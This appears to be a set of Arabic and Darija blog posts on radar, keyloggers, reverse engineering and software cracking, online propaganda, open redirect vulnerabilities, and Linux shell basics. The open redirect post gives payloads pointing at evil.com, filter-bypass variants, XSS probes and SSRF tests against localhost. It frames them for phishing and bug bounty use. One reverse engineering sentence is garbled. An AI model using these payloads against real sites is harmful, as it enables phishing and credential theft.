أولا تعريف الردار هو جهاز كيكشف الأشياء من حولو مثل الطائرات ،السفن... ويقدر يعرف المسافة بينو وبين هاد الأشياء هادشي كيتم عن طريق بعث موجات كهرومغناتصية كتنتشر بسرعة الضوء من كيكون شي شئ كضرب فيه دك الموجة وكتولي ترجع لرادار دب غا تقولي كفاش كيعرف المسافة كما كتعرفو فالفيزياء يلكان عندك السرعة فالحالة ديلنا هي سرعة الضوء و الوقت فالحالة ديانا هو المدة لكتمشي الموجة من رادار وكترجعلو إذن عندنا المدة و عندنا السرعة يمكنا نجبدو المسافة.

أول مر كيتصوب فيها الردار كان قبل وخلال الحرب العالمية الثانية كان كيتصوب بواحد السرية تامة فهاد الدول منهم ألمانيا،أمريكا،بريطانيا،اليابان  ... 

إذن هنا الردار كان لأغراض عسكرية  لترقب العدو  من بعد ردار تطور فعواط ميبق يحددنا غي المسافة بنا وبين الأجسام ولا كيعرف حتى السرعة باش جاين عندو هاد الأجسام بنظر لتردد الموجة الواردة من الجسم وهاد هو الردار لكتستعمل مثلا فترقب الطقس،تحديد سرعة المرور... وهاد الردار يسمى ب doppler radar  لبغ يقلب عليه و يعرف كثر .

ويلكنتو كتعرفو شي ردارات وحد خر متقدمة كتبهم فالتعليقات 

شكرا يل وصلتي حت لهنا ولا كنت غلط فشي حاجة مفيها عيب تصحولي 

المصادر 

 https://en.m.wikipedia.org/wiki/Radar

https://youtu.be/2C0BjpGmEJ8

keylogger

 كيلوجر هو واحد البرنامج لكتتبع اي حاجة  كتكتبها فلوحة المفاتيح لتقدر تكون ارقام هواتف باسوورد ارقام بطاقات بنكية ... وكتكمن الخطورة نتاعو ان فيه واحد الخاصية سميتها روت كيتrootkit  لي كتمكون يكون خفي فالنظام ويكون صعيب الاكتشاف نتاعو ولكن هادشي مكيعنيش انه ميمكنش تعرف واش الجهاز مصاب بيه ولا اول حاجة كترد ليها البال هو الى كان جهاز كيتعطل فالكتابة يعني كتكتب شي حاجة وكتبقا شي ثواني عاد كتبان هنا يمكن يكون الجهاز ديالك مصاب، و كاين واحد البرنامج سميتو malwarebytes anti-rootkit بالنسبة لويندوز وواحد سميتو chkrootkit لماك كيعاونوك تعرف واش الجهاز ديالك مصاب بيه

=> ندوزو دابا لكفاش يمكن يتصاب الجهاز نتاعك بkeylogger 

ايلا وصلك شي ملف فشي ايميل وحلتيه 

ايلا زرتي شي موقع مصاب يمكن يتحمل بشكل تلقائي

يمكن يتثبت بواسطة برنامج ضار فالجهاز 

كاين واحد القطعة كتركب بين lkeyboard و motherboard حتا هي كتسرق البيانات نتاعك داكشي علاش منين تمشي لشي سيبير قلب port لي مركب فيه لكيبورد 

يمكن يتثبث الى ترمى ملف من open access directory في شبكة p2p،

لمكيعرفش p2p هو واحد البرتكول كيتستعمل لمشاركة البيانات والملفات في الشبكة.

=> كفاش كيخدم keylogger؟

منين كتدخل لشي موقع وكتدخل البيانات نتاعك كيلطقتها كيلوجر وكيحطها وملف واما كيسيفطو لشي موقع ولا شي سرفر واما غادي يحتفظ بيها ويخزنها ف hard disk ومن بعد غادي يدير ليها اعدة التوجيه لمالك نتاعو .

=> واخيرا كفاش تحمي راسك من keylogger:

استعمل firewall غادي يعاونك ولكن ماشي تعتامد عليه بشكل كلي 

بدل باسروود نتاع بشكل مستمر مقدرتيش تبقا عاقل على بزاف نتاع باسوورد ستعمل passwords manager هاد كيحتفظ بجميع كلمات السر نتاعك باش متبقاش تدخلهم

دير تحديث للنظام او اي برنامج هادي اهم حاجة حيث كيكون فيهم تغراث.

سمحوا ليا على الاسلوب ما موالفش نكتب، ونتمنى تكونوا فهمتو.

Reverse Engineering

 ما هو علم الهندسة العكسية او الـ Reverse Engineering

ما هي الاستخدامات الخاصة بالـ Reverse Engineering في مجال أمن المعلومات؟

ما هي اهم لغه برمجه تحتاج الى لم يستطع icb.ifcm.net الإجابة على هذه الأسئلة.تعلمها في هذا المجال؟

اهم الادوات التي تساعدك في الهندسه العكسيه ما هي طرق واساليب الهندسه العكسيه؟

ما هو علم الـ Reverse engineering؟ يعتبر الـ Reverse Engineering علم ليس مختص فقط بعلوم أمن المعلومات و لكن هو علم يهتم بتحليل البنيه الخاصة بأي Software او Hardware من أجل الوصول اساسيات تصنيعه ومكوناته بشكل كامل و ذلك من خلال إعادة تصنيعه .

ما هي الاستخدامات الخاصة بالـ Reverse Engineering في مجال أمن وتقنية المعلومات ؟ كثير من الاستخدامات مثلا كثير من المستخدمين يستخدمون الـ Cracks و الـ Keygens من أجل استخدام بعض البرامج دون شرائها هل فكرت فى يوم كيف تصنع ؟

الفكرة ان هذه البرمجيات يتم صنعها عن طريق تحليل كل خطوات البرنامج بشكل كامل و معرفة اين يأتي كود الحمايه للبرنامج حتى لا يتم غلقه على جهازك فقط و هنا يكون دوره كمبرمج من اجل عمل الAnti-License Software فى شكل Crack او Keygen

بالطبع ليس هذا الاستخدام الوحيد و لكن هناك العديد من الاستخدامات مثل :

1- Security Auditing فى التدقيق الأمني

2- Product analysis تحليل المنتجات

3- Extremely useful when you lost documentation فى حالة فقدان المستندات الخاصة بالبرمجيات

4- Competitive technical intelligence كثير من المصنعين يستخدمون ال Reverse Engineering من اجل معرفة كيفيه و نقاط ضعف و قوة المنتجات المنافسة .

5- Software Improvement التطوير المستمر للبرمجيات الخاصة بكل مؤسسة عن طريق التحليل من وجهة نظر عكسيه .

ويمكن تقسيم الهندسه العكسيه الي اقسام عديده ومن ضمنها ..الهندسه العكسيه للبرمجيات Reverse Code Engineering (RCE) هي فرع من فروع هندسة البرمجيات، وتتمثل في مجموع التقنيات والأدوات المستعملة للانطلاق من برنامج قيد العمل والوصول إلى نموذج أو مخطط يسمح بفهم التركيب التكويني للبرنامج

الهدف الأساسي يرمي إلى فهم البرنامج من الجانب التكويني وكيفية تصرف البرنامج وذلك ما يسهل على المبرمجين عملية تطوير وصيانة البرامج القديمة وكسر حماية البرامج التي تحتاج إلى ترخيص وأيضا إعادة استعمال بعض الأجزاء في برامج جديدة.

تحتاج إلى خبرة في التعامل مع الذاكرة والمسجلات ووحدة المعالجة المركزية. لابد أن نعلم جيدا أن الهندسه العكسيه سلاح ذو حدين حيث يمكن ان تستعمل في كسر البرامج الخاصه بالشركات او المبرمجين الاخرين دون شراء ترخيص او شراء تفعيل خاص فيسبب خساره كبيير للشركه او الشخص

او يستخدم في كشف الاخطاء حتى تستطيع ان تقوم بمعالجه هذا الاخطاء بالاعتماد علي التنقيح او ما يعرف بـ Debugging بغرض كشف الاخطاء ومسبابتها وتصحيحها وحل مشاكلها وتستطيع تحديد مدي قوة حمايه البرنامج وقابليته للكسر وهنا تستطيع استخدام الهندسه العكسيه بغرض الحمايه من الكسر

ويوجد كما قلت سابقا اناس تستغل هذا الامر في كسر البرامج او ما يعرف بـ كراك البرامج وكسره ونشره للجميع بهدف عدم القدره على شراءه او نشره لبيان مده قوة الشخص الذي استطاع ان يكسره او للافاده العامه …

بالطبع لابد من الاعتماد على مجموعه من الأليات والعلوم التي تساعدك فى هذا الامر بالاضافة الـ Debugging: –

Disassembler: و هو كيفية تحويل البرنامج من لغة Machine Language الى Assembly Language و بالتالي يتم تحليل كيفية يعمل البرنامج مع الـ Resources الخاصة بجهازك .

– Decompiler : و هو تحويل الـ Code الخاص بأي برنامج الى لغه برمجيه مثل ال C او C++ – Packers or un-packers: فك الارتباط بين الواجهه التطبيقيه لأي برنامج ويعتمد في ذلك على ان اي برنامج لابد من فك ملفاته خلال عملية الانزال Setup

– Hex Editing: كيفية الحصول على الـ Binary Code الخاص بالبرنامج . – Cryptography : كيفية استخدام التشفير فى اي برنامج ونقاط الضعف التي قد تنتج عن استخدام Encryption Key او Algorithm سهل الكسر

ما هي اهم لغه برمجه تحتاج الي تعلمها في هذا المجال؟ Assembly Language من اهم لغات البرمجه في هذا المجال ولن نستطيع شرحها في مجرد تغريده بل يجب ان تعرف ان لها العديد من الكتب التي تشرح بيئه عملها وطرق البرمجه بها

بعض اهم ادوات التي سوف تساعدك في مجال الهندسه العكسيه ؟

1 – PEID

2 – OLLYDBG

3 – IDE

4- Immunity Debugger

طرق واساليب الهندسه العكسيه ببساطه؟

1 -Serial Phishing

2 – general reverse engineering

3 – KEYFILING

4 – Code injection

5 – Brute forcing

6 -Patching Reversing

7 – key generator

8 – LOADER Files

تلك من الطرق واساليب الهندسه العكسيه المشهوره وكل اسلوب له آلية عمل مختلفه عن الاخر حتى تصل الى هدفك الاساسي هو كسر برامج بطريقه سليمه بدون تعطيب الملف لهذا يخسر الكثير من الشركات والمبرمجين الكثير من المال بسبب كسر برامجهم وهذا يمكن ان يدل على شيء هو ضعف الخبره في حمايه البرامج

ويلزم ان يكون المبرمج على علم بمجال الهندسه العكسيه حتي يستطيع ان يحميه و يتم عمل testing بشكل منهجي وهناك العديد من الـ frameworks التي تخدم هذا الأمر مثل الـ SDLC

و ايضا العديد من الـ frameworks التي تخدم الـ testing مثل Linear testing , modular based testing , library architecture , keyword-driven , hybrid testin

الدباب الالكتروني

 الدباب الالكتروني كاين عند اي دولة الهدف ديالوا تضليل الناس عن الحقيقة

 ا باش نفهمك مزيان لكان تفرج ففيلم المنشق  the dissident لدوا على موت الصحفي خاشقجي حيث بين ان الدباب هو مجموعة من الناس لكيكونو خدامين لصالح الدولة و كل واحد على الاقل كيكون عندو شي 5 د الحسابات على كل موقع تواصل اجتماعي و لبين انهم كانوا مناصرين للدولة السعودية ا كيكدبوه  

غا تقولي اوى اش جاب لجاب اسيدي راه تا اس___رائيل دبا خداما بنفس المنهج باش انها تبين للناس ان هي لصحيحة و فلسطين هي لظالمة دبا فهمنا شنو هو الدباب اجي نشوفو التاثير الحقيقي ديالو ا غا نجي المغرب الحبيب ا غا ناخد الدباب هو الناس لمتبعا التفاهة حيث هما براسهم دباب فقما كيكون الشعب ولا كيوعى كيبانوا زوج تافهين ولا اي واحد ولا مجموعه كيديرو شي حاجة لكتجبد التافهين هنا كنتقسموا لزوج ناس باغا التفاهة و ناس لا و كما جرت العادة لكفة كتمشي للحاجة الساهلة هنا كلشي كينسا تا علاش كان كيناضل ولا شنو المشاكل لكيعاني منها داخل الوطن هكا هاد المثال طبقوا على الدباب الكتروني غا تبقا كل نهار تشوف العدد ديال المناضلين كينقسوا... الخ 

(كنتمنى تكونوا فهمتوا ) 

دبا شنو هو الحل نرجعوا الوثائقي the dissident و لفكر فيه عمر و جمال اقادوا مجموعة د الناس لسماوهم بالنحل الالكتروني و كان الدور ديالو هو شن حرب الكترونيه على الدباب الالكتروني و كان غلب بحيث ولا بكل بوسط كيدير #what do you Know about the bees هنا العالم كامل عرف حقيقة السعوديه ... 

لهذا عزيزي المواطن متستهزا بتا شي # تطلق راه تقدر توصل لفكرة لابعد مدى غا بسباب واحد خونا دار واحد الهاشتاج 

open redirect

 open redirect

و المعنى ديال هاد الاسم هو التحويل المفتوح فشناهية هاد الثغرة وكيفاش كتخدم

اولا هاد الثغرة كتمكنك من انك تحول الضحية من الموقع الرسمي ولي كيتيق فيه بحال مثلا فيسبوك لشي موقع اخر بلا ميحس

يعني مثلا نفتارضو انك كنتي كتقلب في شي target ولقيتي url ديال الموقع على هاد الشكل

www.site.com/?redirect=/home

فهنا كنشوفو ان الموقع كيتيق في parameter لي سميتو redirect وكيحولك مباشرة للصفحة الرئيسية ديال الموقع لي مثلا  www.site.com/home

إدن هنا ممكن تلعب بالمتغير redirect وتحولو لهاد الشكل

www.site.com/?redirect=http://evil.com

يعني هاد الرابط إلا صيفطيه لأي واحد اولا غادي يتيق في الاسم ديال الموقع ومغاديش يشك في انه رابط زائف كما غادي يمكنك من انك تحول الضحية للموقع ديالك ولي يمكن ليك تصوب صفحة تسجيل الدخول مشابهة لصفحة الموقع الاصلي وهنا تقدر تسرق بيانات تسجيل الدخول ديال الضحية

ودبا ندوزو لكيفاش تتخطى الحماية لكتكون على هاد النوع من الثغرات

ممكن إلا حطيتي هاديك http://evil.com مينجحش attack

تقدر تبدل الحروف الصغيرة بالحروف الكبيرة مثلا

HTTP://EVIL.COM

أو لا تكتب http:// جوج ديال المرات مثلا

http://http://evil.com

أو لا تحدف هاديك http: مثلا

//evil.com

أو لا تدير encoding ل http://evil.com ب url encoding

يمكن ليك تشوف الصورة لي لتحت را فيها بعض الطرق الاخرى ديال تخطي الحماية

هاد الثغرة في bug bounty كتعتبر بسيطة يعني تقدر تشد فيها ما بين 50 حتل 100 دولار طبعا على حساب program

دبا غادي نشوفو طرق باش طلع هاد الثغرة من بسيطة الى متوسطة تقدر تطلعها حتال عالية الخطورة

اول حاجة غادي تديرها إلا لقيتي الموقع مصاب بهاد التغرة وقدرتي تتحول الى موقع اخر هي انك تجرب ثغرة xss يعني غادي تجرب تحقن اكواد javascript في الموقع

جرب تحقن هاد الكود البسيط في المتغير وشوف واش غادي يطلع alert message مثلا

www.site.com/?redirect=<script>alert(1);</script>

ولا مصدقتش جرب تدير للكود url encoding

كما يمكن ليك تجرب هاد الكود ايضا

www.site.com/?redirect=javascript:alert(1);

ولا مصدقش دير ليه تاهو url encoding

ويمكن ليك ايضا تطلع الخطورة حتل عالية بانك تجرب تلقى ثغرة ssrf (غادي ندير عليها شرح بوحدها)

بأنك تجرب توصل لشبكة الداخلية و localhost

بانك تشوف واش غادي يتم تحويلك لlocalhost بانك تحقن هاد الرابط http://127.0.0.1

ولا قدرتي توصل لlocalhost او الشبكة الداخلية فمبروك عليك ولا مصدقتش ممكن تجرب تتخطى الحماية بنفس الطرق لي قلت لفوق

ودبا ندوزو لفين ممكن تلقى هاد النوع من الثغرات

إلا قلبتي في الموقع وما لقيتي حتا شي متغير سميتو redirect ولا url ولا u ولا اي متغير كيحولك لصفحة اخرى جرب انك تدير تسجيل الدخول للموقع وسير لشي صفحة ميمكنش تدخل ليها إلا يلا كنتي login بحال صفحة تعديل الاسم او كلمة السر ومن بعد دير نسخ لرابط ودير تسجيل الخروج ومن بعد حاول تطلب هاداك الرابط لي نسختي فهنا يقدر يحولك لصفحة تسجيل الدخول ولا شفتي الرابط ديالها راه تقدر تلقا شي متغير لي تقدر تجرب فيه

الثلاثاء، 1 يونيو 2021

Shell

Shell

هي برنامج تعمل على استقبال الاوامر منك ثم يطلب من النواة ان تقوم بتنفيذ هذه الاوامر. اي تعمل كوسيط بينك وبين نظام التشغيل او بمعنى اخر هي تمثل الطبقة الخارجية او الواجهة للنظام، فيقوم بأخذ الاوامر منك واعطائك النتيجة.  ثم بعد ذلك يقوم بإظهار المحث مرة اخرى، دلالة على انهاء التنفيذ، وانتظارك لإدخال المزيد من الأوامر.  لهذا السبب يطلق على ال shell بانه مفسر اوامر command interpreter وهو شبيه بالcommand.com  في انظمة windows. كما يحتوي على لغة برمجة شبيهه باللغات عالية المستوى قوية جدا تستطيع من خلالها حل اي مشكلة تواجهك. وايضا أحد الميزات الهامة وهي امكانية عمل ملف يحوي على مجموعة من البرامج لأنشاء برنامج اخر وهذا يمكنك من انتاج ما يعرف بالسكربت، ويوجد الكثير من انواع ال shell ولكن الاكثر شهرة واستخداما هم نوعين رئيسيين: 

 ·ال Bourne shell ويتضمن ال sh,ksh,bash

·ال C shell ويتضمن ال csh,tcsh

اذا كنت تستخدم احد انواع ال Bourne shell  فان المحث الافتراضي لك كمستخدم هو $ اما اذا كنت تستخدم احد انواع ال C shell  فان المحث الافتراضي لك كمستخدم هو % 

ما هو المحث shell propmt ؟

المحث سواء كان كذا % او كذا $ فهو يعتمد على نوع ال shell  الذي تستخدمه ،  فعندما يظهر المحث يعني ان الشل ينتظر منك كتابة الاوامر لكي ينفذها واذا كنت قد دخلت الى النظام كجذر ROOT اي مدير نظام فان المحث # سوف يظهر لك. وفيما يلي نستعرض ميزات وعيوب كل نوع من انواع ال shell بشكل سريع:

النوع الاول ويشمل: 

الـــ Bourne shell  ويرمز له بــ sh  الـــ Korn shellويرمز له بــ ksh الـــ Bourne againshell  ويرمز له الـــ bash

·النوع الثاني ويشمل: 

الـــ C shell ويرمز له بــ csh الـــ TENEX/TOPS C shell ويرمز له بــ tcsh

بداية الـــ shell كانت مع Bourne shell  حيث قام stephen R.Bourne  بكتابته على نظام unix  وذلك في منتصف 1970 في معمل AT&T.  لذلك يطلق البعض عليه اسم الشل “The Shell”  وذلك لانه الاول ظهورا. يوجد هذا الـــ shell عادة في المسار /bin/sh وكما ذكرت سابقا فال الـــ shell عبارة عن مفسر أوامر  وكذلك يحوي لغة برمجة تستخدم صيغةsyntax لغة الـــ ALGOL ، وتحوي الاشياء التالية:

متغيرات، دوال، اوامر تحكم في سير البرنامج، اوامر تكرار، اوامر معالجة، تعابير رياضية…الخ 

وتشترك جميع انواع الBourne-type في هذه الميزات.. لكن ما يعيب هذا النوع الاصلي هو الصعوبة في الاستخدام.. حيث لا يوجد خاصية اكمال النص تلقائي ، وكذلك لا يوجد خاصية حفظ الاوامر التي تم تنفيذها.

وبعد 10 سنوات اي في 1980 قام Bill joy بكتابة الـــ C shellحيث تلافى الصعوبة التي وجدت في النوع السابق وايضا جعل الصيغة syntax من ALGOL  الى صيغة لغة ال C

ومن الميزات التي وجدت فيه:

خاصية اكمال النص، حفظ الاوامر المكتوبة سابقا . وعادة نجد هذا الـــ shell داخل المسار /bin/csh 

واما عيوبه فهي: ضعف في دعم عمليات الادخال والاخراج يفتقر الى الدوال ، لذلك فهو غير محبذ للبرمجة، فقط للاستخدام . 

اما الـــ TENEX/TOPS C shell ويرمز له ب tcsh فهو عبارة عن نسخة محسنة من الـــ cshell حيث اضافات العديد من الميزات ،منها استخدام الاسهم( اعلى – اسفل) لمشاهدة الاوامر التي تم تنفيذها وكذلك السهم (يمين-يسار) لتعديل هذه الاوامر. في هذا الزمن،، وبعد ان توفر نوعين من ال shell قام David Korn في AT&T بكتابة الـــ Korn shell ويرمز له بــ ksh

وقد جمع فيه سهولة الـــ C shell ، وكذلك صيغة ال Bourne shell فأصبح الـــ ksh هو الخيار المفضل للعديد من المستخدمين .

وبشكل عام  يعتبر الـksh  متوافق مع النوع الاول وهو الـsh  فالأوامر نفسها تعمل في كلتيهما باستثناء بعض الاشياء والتي سنتطرق لها في حينها . ويوجد 3 نسخ من هذا الشل وهي:

الـOfficial  ويرمز لها بــksh  وهي التي تحدثنا عنها والـ Public domain ويرمز لها بــ  pdksh واخيرا نسخة الـ Desktop ويرمز لها بــ dtksh. ويستخدم مبرمجو الـshell  غالبا النسخة الاولى والثانية  اما الثالثة dtksh  فهي لمستخدمي الــ  Shell ويوجد الــ      ksh عادة في المسار /bin/ksh او /usr/bin/kshاما النسخ الاخرى فيمكن تنزيلها من النت اذا لم تأتي مع نظامك.

واخيرا الــ  Bourne again shell وهو الشل المستخدم حاليا في معظم التوزيعات حيث قام مطوره Brian fox بجمع الميزات السابقة ووضعها فيه  لذلك اصبح هو المفضل حالياويوجد عادة في المسار/bin/bash او المسار /bin/sh حيث اصبح هو الشل الافتراضي.

متى يبدأ الشل بالعمل ومتى ينتهي؟

عند الدخول الى النظام، يبدأ برنامج getty بالعمل حيث يطلب منك كتابة اسم المستخدم والباسووردثم يقوم بتمريرها الى برنامج login الذي يتأكد من البيانات المدخلة ، وذلك بمقارنتها مع  /etc/passwd ويظهر كالتالي مثلا: 

SudaNix:x:500:500:ahmad:/home/SudaNix:/bin/bash

وفي حال المطابقة سوف يتم تنفيذ الشل الموجود في الملف ، وفي هذه الحالة هو/bin/bash وعندما تعمل تسجيل خروج ينتهي عمل الــ Shellولتغير نوع الشل قم بتغيره من خلال كتابة الامر: /bin/csh هنا تم التغيير الى Cshell وللخروج اكتب الامر exit

·الشل التفاعلي وغير التفاعلي!! 

عندما يظهر لك المحث prompt  هذا يعني ان الشل يعمل بشكل تفاعلي interactive واعني بشكل تفاعلي اي انه ينتظر منك ان تكتب الاوامر لكي ينفذهاوهذا هو الوضع الطبيعي المألوف حيث تقوم بالدخول الى النظام ، عندها يبدأ الشل بالعمل .. ثم تقوم بكتابة بعض الأوامر،  وتخرج من النظام حيث يقوم الشل بالوقوف عن العمل. 

ويناقضه الشل غير التفاعلي: 

ويعني انه لا يوجد اي تفاعل بينك وبين الشل  اي انه لن ينتظر منك ان تكتب اي أوامر ،  حيث يقوم بتنفيذ اوامر محفوظة داخل ملف  وعندما يصل الى نهاية الملف  يتوقف عن العمل وهذا ما يعرف بالسكربت .والان بعد ان تعرفنا على الشل وانواعه، بقي ان نستعرض مفهومين اساسيين هما: 

الاوامر commands

الامر هو عبارة عن برنامج program  تستطيع تشغيله وذلك بكتابة اسمه ثم الضغط على enter.  مثال: الامر date يقوم بإظهار اليوم، ا لتاريخ، الساعة.لاحظ ان المحث $ قد عاود بالظهور مرة اخرى وهذا يدل على ان البرنامج قد انتهى من التنفيذ..

مثال اخر: الامر who  يقوم بإظهار اسماء كل مستخدمين هذا النظام بالإضافة الى بعض المعلومات و يوجد عدة انواع من الاوامر,,وهي الاوامر البسيطة ،المركبة ، المعقدة.

الاوامر البسيطة simple commands

واضح من اسمها انها بسيطة اي تحوي فقط اسم البرنامجمثل الامرين السابقين date , who وكذلك العديد من الاوامر التي سأتطرق لها فيما بعد.

الاوامر المعقدة complex commands

هو عبارة عن اسم البرنامج البسيط مضافا اليها واحد او اكثر من الوسائط arguments . مثال لكي يتضح لناالامر:

 who كما ذكرنا يعطيك معلومات عن جميع المستخدمين واوقات دخولهم للنظام ولكن بكتابة الامر: who am i  سوف تأتيك معلومات عنك فقط. اسم المستخدم الذي تعمل عليه وكذلك وقت دخولك للنظام. اذن am وi عبارة عن وسائط تدخل على الامر who فتعدل من سلوكه. ومعظم الاوامر الموجودة تقبل العديد من الوسائط التي تغير طريقة عملها الافتراضية وسوف نرى ذلك لاحقا.

الاوامر المركبة compound commands

هي عبارة عن اوامر تجمع ما بين الاوامر البسيطة والمركبة..ويتم الفصل بينهما باستخدام الفاصلة المنقوطة semicolon ; مثال الامر : date ; who am i ;

يقوم هذا الامر المركب بتنفيذ الامر البسيط date اولا ثم ينفذ الامر المعقد whoam i ويتم الفصل بين الاوامر باستخدام الفاصلة المنقوطة  وفي حالة عدم وضعها ،اي تم كتابة الامر على الشكل : date who am iسيحدث خطا.. ولن ينفذ شيء  وستاتيك رسالة خطا لان هذا المفسر اعتقد بان date هو الامر او البرنامج، وان who am i  عبارة عن وسائط له وهذا خطا

ومن الجدير بالذكر هو انك تستطيع كتابة الفاصلة المنقوطة في نهاية اي امر سواء كان مركبا او بسيطا او معقد مثلا الامر: date; والنتيجة نفس نتيجة الامر date

ملاحظة اخيرة على الاوامر: 

وهي عند كتابة اي امر وقبل تنفيذه يقوم الشل بالتأكد من وجوده في مسار محدد PATH في حالة وجود الامر او البرنامج فيه يقوم بتنفيذه ،، وفي حالة عدم وجوده يعطيك الخطأ command not found

ما هو الشل سكربت shell script ؟

هو عبارة عن ملف به مجموعة من الاوامر لتأدية غرض معين، حيث يقوم الــ shell بتنفيذها بشكل غير تفاعلي سيتضح لك التعريف من خلال المثال الاتي: مثلا يحتوي صندوق النجار على ادوات (مفكات ، مسامير ، خشب ، مطرقة … الخ ). يستطيع من خلالها بناء كراسي ، طاولات ، دواليب … الخ. فباستخدام نفس الادوات ولكن بتركيبة معينة يستطيع بناء اي شيء يريده.. 

هذا المثال يشبه الــ shell scripting تماما. فلبناء اي شيء تريده يجب ان تستخدم الادوات الصحيحة  ويطلق عليها اوامر او برامج ، وقد تم ذكرها في الاعلى.

كتابة اول shell script : افتح اي مستند – ملف Text – وقم بكتابة الاتي: 

date;who;

وقم بحفظ الملف باي اسم وليكن sudanix

الان تقوم بنتفيذ هذا السكربت ، قم بكتابة : 

/bin/bash sudanix

الان سوف تظهر النتيجة وهي عبارة عن ناتج الامر date وناتج الامر who . 

تحويل السكربت الى سكربت قابل للتشغيل executable ؟؟ 

واحدة من اهم الخطوات ،، لكي نجعل الملف قابل للتنفيذ.. اي نقوم بتنفيذ بواسطة اسمه فقط. هي: 

تحويل الملف الى ملف قابل للتنفيذ عن طريق الامر 

chmod a+x ./sudanix

ولكن يجب علينا ان نتأكد من نوع الشل الذي سوف يستخدم.. ولاننا لا نضمن ان يكون كل مستخدمي الشل يعملون على bash ،سوف نضيف هذا السطر الى بداية السكربت.. ووظيقته هو تشغيل الشل المحدد في الملف : 

#!/bin/bash

مع ملاحظة ان يكون هذا السطر في بداية السكربت .وبالتحديد في اول سطر !! والا سيتم اهماله .. اي سيصبح السكربت كالتالي: 

#!/bin/bash

date;who;

الان لتنفيذ هذ السكربت اكتبه على الشكل الاتي مع ملاحظة ان تكون في نفس المجلد الذي يحوي السكربت. 

./sudanix

طبعا هذا مثال بسيط جدا.. لم نستخدم فيه اي برمجة.. ولكن لكي تأخذ فكرة عنه